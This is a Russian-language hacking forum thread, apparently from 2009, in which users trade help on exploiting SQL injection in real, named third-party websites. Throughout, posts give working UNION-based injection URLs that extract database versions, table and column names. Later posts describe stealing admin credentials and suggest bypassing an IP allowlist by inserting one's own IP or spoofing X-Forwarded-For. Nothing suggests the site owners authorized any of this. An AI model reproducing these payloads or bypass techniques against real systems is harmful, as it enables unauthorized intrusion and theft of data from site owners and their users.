Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://pocketbook.com.ua/index.php?id=204+union+select+0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14+--+
    вопрос что как здесь правильно поступить если 1 переменная в 2 или 3-х запросах
    mailbrush:
    на этом сайте пробывал не получается как ты говришь, вот

    http://pocketbook.com.ua/index.php?id=204'+and+'1'='2'

    поправь меня если мож не так понял
     
  2. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    не сочтите за полного лола но все же еще спрошу

    http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,2,3+--+

    здесь вроде есть инк но ни табл ни user() ниче не работает, то есть 0,1,2,3 выводит и усе
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1. Скуля есть, пятая ветка, если нашел ошибку с КАВЫЧКОЙ это вовсе не означает, что БЕЗ кавычки ты уже не сможешь повлиять на скуль запрос:

    Code:
    http://pocketbook.com.ua/index.php?id=204+and+substring(version(),1,1)=5
    
    2. Проверяем, есть ли принтабельные поля, предварительно пытаясь подобрать их кол-во, собственно:

    - принтабельных полей вроде нет, вывод - слепая скуля

    3. Не устраивает слепая - ищи скули в ссылках на этом же сайте по другим параметрам

    по второму сайту:

    Code:
    http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,unhex(hex(version())),3+--+
    
    Только брут
     
    2 people like this.
  4. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    мдя, учится и еще раз учится, спасибо, кое что понял
     
    2 people like this.
  5. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Можите пожалуйсто подсказать , что можно в этой SQL inj сделать?
     
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Это не инъект.
     
  7. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    а вообще можно, что нибуть с ней сотворить?
     
  8. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    SeNaP: я уже тебе отвечал, не флуди, там конкретно есть фильтр, а то что ты -2 ввел и еррор так это просто в базу неверный запрос пошел с - числом.
    мож я не прав, поправьте )
     
  9. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    http://rcc-penza.ru/content.php?action='
    http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid='
    ошибки sql, я новичек в этом) что нибудь дальше можно сделать с этим?)
     
  10. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    мануал почитать хотябы((
     
    2 people like this.
  11. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2M1ks
    Code:
    http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11--+
    Code:
    http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11+from+information_schema.tables--+
    Code:
    http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,column_name,10,11+from+information_schema.columns+where+table_name=0x666f72756d--+
    Но в бд акаунтов вроде как нет...
    Там походу на админку (http://rcc-penza.ru/admin) установлен .htaccess на доступ по ипу.

    2S00pY
    Я б ему не мануалы посоветовал почитать, а хотябы поверхносно изучить БД ;)
    А потом уже мануаль по скулям )
     
    #7031 bug1z, 12 May 2009
    Last edited: 12 May 2009
    2 people like this.
  12. dllerk

    dllerk New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Посмотрите пожалуста , здесь можно что то сделать :? http://www.melaniec.ru/news/print.php?id=9-
     
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Читаем вопрос №1.

    http://forum.antichat.ru/thread104591.html
     
  14. Deep-Ocean

    Deep-Ocean New Member

    Joined:
    12 May 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток.
    Помогите с SQL инъекцией.
    по нормальному работает такой запрос:
    SELECT
    *
    FROM products as p,
    products_description as pd
    WHERE p.products_id IN (1) and
    p.products_id = pd.products_id
    and pd.language_id = '1'
    and p.products_status=1 order by pd.products_name limit 5


    при определенном запросе можно влезть в IN ( ... )

    например site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+IN(1

    получим
    SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) union select 1,2,DATABASE(),4,5,6 IN(1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5

    ну и
    MYSQL ERROR REPORT
    - 13/05/2009 11:05:58
    ---------------------------------------
    1109 - Unknown table 'p' in field list


    Я не очень в SQL, потому не получается у меня состряпать что-то полезное))

    Спасибо.
     
  15. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    попробуй делать
    Code:
    site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/*
    или в конце +-- или %23
    или
    Code:
    site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1
    Ну и естественно там не обязательно 6 столбцов.
     
  16. Deep-Ocean

    Deep-Ocean New Member

    Joined:
    12 May 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    это не работает...

    ну да, там получается 44 столбца и
    Code:
    site/compare.php?cPath=&products[]=1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,DATABASE(),37,38,39,40,41,42,43,44+from+products as p, products_description as pd WHERE p.products_id+IN(1
    работает отлично.... только вот ешё вопрос:
    можно ли сделать UPDATE, INSERT ? и как? :)
     
  17. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Ну если ты получишь полноценный доступ к бд, то можно(правда не всегда). А через sql inj нельзя.
     
    1 person likes this.
  18. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    У меня вот какой вопрос. я через sql enjection нашел в бд логин и пас к админке. и еще есть таблица admin_ip в ней 15 айпи. когдла я пытаюсь зайти в админку то пишет доступ запрещен. Видимо проходит проверка на ип. если мой ип совпадает с одним ип из таблицы админ_ип то меня допускают к вводу пароля. как это обойти - проверку по ип?
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    kakim libo sposobom vstavit' svoi ip v etu tablicu
     
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    xm. ili otpravlyaya paket izmenit' x_forwarded_for
    mb v zaprose est' skulya
    nu eto tak, mysli vslux
     
Thread Status:
Not open for further replies.